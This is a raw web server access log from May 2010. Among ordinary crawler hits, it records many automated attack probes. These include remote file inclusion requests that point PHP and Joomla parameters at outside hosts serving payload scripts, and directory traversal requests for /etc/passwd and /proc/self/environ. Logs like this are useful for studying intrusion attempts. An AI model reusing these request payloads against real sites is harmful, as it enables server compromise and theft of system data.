195.190.166.35 - - [31/May/2010:00:45:00 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_rssfactory&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.galwayindependent.com/cache/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
195.190.166.35 - - [31/May/2010:00:45:00 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_rssfactory&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.galwayindependent.com/cache/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
118.98.216.44 - - [31/May/2010:00:45:10 -0500] "GET /logs/access_log.1227571200 HTTP/1.0" 404 298 "http://www.google.com/search?client=ubuntu&channel=fs&q=ubuntu+kethek&ie=utf-8&oe=utf-8""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
118.98.216.44 - - [31/May/2010:00:45:12 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
118.98.216.44 - - [31/May/2010:00:45:15 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
207.46.13.51 - - [31/May/2010:00:45:56 -0500] "GET /logs/access_log.1236470400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.50 - - [31/May/2010:00:46:59 -0500] "GET /logs/access_log.1212278400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.61.185.200 - - [31/May/2010:00:47:50 -0500] "GET /logs/access_log.1273622400%20%20//adminhead.php?path[docroot]=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
200.61.185.200 - - [31/May/2010:00:48:52 -0500] "GET /logs/access_log.1271548800//adminhead.php?path[docroot]=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.195.112.180 - - [31/May/2010:00:52:41 -0500] "GET /logs/access_log.1207872000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.11.114 - - [31/May/2010:00:54:41 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 7670 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:54:43 -0500] "GET /logs/?option=com_alphauserpoints&view=../etc/passwd%00 HTTP/1.1" 200 7670 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:54:44 -0500] "GET /logs/?option=com_alphauserpoints&view=../../etc/passwd%00 HTTP/1.1" 200 7670 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:54:45 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../etc/passwd%00 HTTP/1.1" 200 7670 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:54:47 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../etc/passwd%00 HTTP/1.1" 200 7670 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:54:48 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../etc/passwd%00 HTTP/1.1" 200 7670 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:54:50 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../etc/passwd%00 HTTP/1.1" 200 7670 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:54:51 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../etc/passwd%00 HTTP/1.1" 200 7670 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:54:52 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 7670 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:54:54 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 7670 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:54:55 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 7670 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:54:56 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 7670 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:54:58 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 7670 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:54:58 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:54:59 -0500] "GET /?option=com_alphauserpoints&view=../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:55:01 -0500] "GET /?option=com_alphauserpoints&view=../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:55:02 -0500] "GET /?option=com_alphauserpoints&view=../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:55:03 -0500] "GET /?option=com_alphauserpoints&view=../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:55:04 -0500] "GET /?option=com_alphauserpoints&view=../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:55:06 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:55:07 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:55:08 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:55:09 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:55:11 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:55:12 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:00:55:13 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
38.101.148.126 - - [31/May/2010:00:56:48 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [31/May/2010:00:56:56 -0500] "GET /logs/access_log.1244851200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
207.46.13.87 - - [31/May/2010:00:57:26 -0500] "GET /logs/access_log.1259107200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [31/May/2010:01:04:03 -0500] "GET /logs/access_log.1246060800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:01:04:05 -0500] "GET /logs/access_log.1246147200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:01:04:07 -0500] "GET /logs/access_log.1246233600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:01:04:09 -0500] "GET /logs/access_log.1246406400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:01:04:13 -0500] "GET /logs/access_log.1246492800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:01:04:14 -0500] "GET /logs/access_log.1246665600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:01:04:16 -0500] "GET /logs/access_log.1246752000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:01:04:19 -0500] "GET /logs/access_log.1246924800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:01:04:22 -0500] "GET /logs/access_log.1247270400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:01:04:24 -0500] "GET /logs/access_log.1247443200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
207.46.204.238 - - [31/May/2010:01:06:26 -0500] "GET /logs/access_log.1187049600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.73.228.20 - - [31/May/2010:01:06:46 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.73.228.20 - - [31/May/2010:01:06:46 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
174.121.162.252 - - [31/May/2010:01:11:05 -0500] "GET /logs//setup.php?dir=http://www.sdit-alfirdaus.sch.id/components/com_sef/1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.121.162.252 - - [31/May/2010:01:11:05 -0500] "GET /logs/access_log.1262563200//setup.php?dir=http://www.sdit-alfirdaus.sch.id/components/com_sef/1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.121.162.252 - - [31/May/2010:01:11:05 -0500] "GET //setup.php?dir=http://www.sdit-alfirdaus.sch.id/components/com_sef/1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:01:16:17 -0500] "GET /inc/download_center_lite.inc.php?script_root=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:01:16:17 -0500] "GET /logs/inc/download_center_lite.inc.php?script_root=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:01:16:17 -0500] "GET /logs/access_log.1271376000/inc/download_center_lite.inc.php?script_root=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:01:16:19 -0500] "GET /logs/access_log.1271894400/inc/download_center_lite.inc.php?script_root=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
62.149.207.129 - - [31/May/2010:01:19:49 -0500] "GET /logs//include.php?language=0&lang_settings=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.813"
62.149.207.129 - - [31/May/2010:01:19:50 -0500] "GET //include.php?language=0&lang_settings=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.813"
62.149.207.129 - - [31/May/2010:01:21:52 -0500] "GET /index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
90.182.36.29 - - [31/May/2010:01:22:00 -0500] "GET /logs/access_log.1271721600///?_SERVER[DOCUMENT_ROOT]=http://www.shangeli.net/_sys/_ext/skin/_skin/gallery_preview/image/btn_z_1.gif??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
90.182.36.29 - - [31/May/2010:01:22:00 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.shangeli.net/_sys/_ext/skin/_skin/gallery_preview/image/btn_z_1.gif??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
90.182.36.29 - - [31/May/2010:01:22:00 -0500] "GET /logs/access_log.1271548800///?_SERVER[DOCUMENT_ROOT]=http://www.shangeli.net/_sys/_ext/skin/_skin/gallery_preview/image/btn_z_1.gif??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
90.182.36.29 - - [31/May/2010:01:22:01 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.shangeli.net/_sys/_ext/skin/_skin/gallery_preview/image/btn_z_1.gif??? HTTP/1.1" 200 7676 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:01:23:29 -0500] "GET //components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 334 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:01:23:29 -0500] "GET /logs//components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 339 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:01:23:29 -0500] "GET /logs/access_log.1271462400//components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 361 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:01:24:03 -0500] "GET //components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 334 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:01:24:03 -0500] "GET /logs//components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 339 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:01:24:05 -0500] "GET /logs/access_log.1271462400//components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 361 "-""Mozilla/5.0"
64.119.131.71 - - [31/May/2010:01:24:05 -0500] "GET /logs/access_log.1271635200/mx_glance_sdesc.php?mx_root_path=http://rxv8.interfree.it/id.jpg?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
64.119.131.71 - - [31/May/2010:01:24:07 -0500] "GET //mx_glance_sdesc.php?mx_root_path=http://rxv8.interfree.it/id.jpg?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
64.119.131.71 - - [31/May/2010:01:24:09 -0500] "GET /logs//mx_glance_sdesc.php?mx_root_path=http://rxv8.interfree.it/id.jpg?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
211.132.187.170 - - [31/May/2010:01:24:42 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
211.132.187.170 - - [31/May/2010:01:24:43 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
207.241.227.75 - - [31/May/2010:01:26:28 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""ia_archiver-web.archive.org"
64.119.131.71 - - [31/May/2010:01:27:29 -0500] "GET /logs/access_log.1272153600/mx_glance_sdesc.php?mx_root_path=http://rxv8.interfree.it/id.jpg?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
207.46.199.184 - - [31/May/2010:01:27:59 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.119.131.71 - - [31/May/2010:01:28:31 -0500] "GET /logs/access_log.1271980800/mx_glance_sdesc.php?mx_root_path=http://rxv8.interfree.it/id.jpg?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
81.92.204.67 - - [31/May/2010:01:30:53 -0500] "GET //journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:30:53 -0500] "GET /logs/access_log.1271548800//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:30:54 -0500] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
62.149.207.129 - - [31/May/2010:01:33:55 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
62.149.207.129 - - [31/May/2010:01:33:55 -0500] "GET /index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
62.149.207.129 - - [31/May/2010:01:33:56 -0500] "GET /logs/index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
88.208.230.63 - - [31/May/2010:01:38:59 -0500] "POST //xmlrpc/client.php HTTP/1.1" 404 302 "-""Mozilla/5.0"
88.208.230.63 - - [31/May/2010:01:39:01 -0500] "POST /logs//xmlrpc/client.php HTTP/1.1" 404 307 "-""Mozilla/5.0"
207.46.13.143 - - [31/May/2010:01:41:56 -0500] "GET /logs/access_log.1174694400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.92.204.67 - - [31/May/2010:01:43:42 -0500] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:43:42 -0500] "GET /logs/access_log.1271548800//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:43:42 -0500] "GET //journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:44:36 -0500] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:44:36 -0500] "GET //journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:44:36 -0500] "GET /logs/access_log.1271548800//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
87.250.255.243 - - [31/May/2010:01:44:47 -0500] "GET /logs/access_log.1214784000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.92.204.67 - - [31/May/2010:01:45:25 -0500] "GET //journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:45:25 -0500] "GET /logs/access_log.1271548800//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:45:25 -0500] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:01:46:03 -0500] "GET /logs//Madirish_Webmail/index.php?basedir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 316 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:01:46:03 -0500] "GET /logs/access_log.1272240000//Madirish_Webmail/index.php?basedir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:01:46:15 -0500] "GET //Madirish_Webmail/index.php?basedir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 311 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:46:20 -0500] "GET //journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:46:20 -0500] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:46:20 -0500] "GET /logs/access_log.1271548800//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:46:25 -0500] "GET //journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:46:25 -0500] "GET /logs/access_log.1271548800//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:46:25 -0500] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:47:17 -0500] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:47:17 -0500] "GET //journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:47:17 -0500] "GET /logs/access_log.1271548800//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:47:59 -0500] "GET /logs//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:47:59 -0500] "GET //journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
81.92.204.67 - - [31/May/2010:01:47:59 -0500] "GET /logs/access_log.1271548800//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:01:48:32 -0500] "GET /logs/access_log.1272240000//Madirish_Webmail/index.php?basedir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:01:48:32 -0500] "GET //Madirish_Webmail/index.php?basedir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 311 "-""Mozilla/5.0"
89.238.145.196 - - [31/May/2010:01:48:32 -0500] "GET /logs//Madirish_Webmail/index.php?basedir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 316 "-""Mozilla/5.0"
207.46.13.90 - - [31/May/2010:01:48:57 -0500] "GET /logs/access_log.1199577600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.149.207.129 - - [31/May/2010:01:50:17 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
213.186.60.116 - - [31/May/2010:01:57:42 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:01:57:43 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.92.204.67 - - [31/May/2010:01:58:14 -0500] "GET //journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
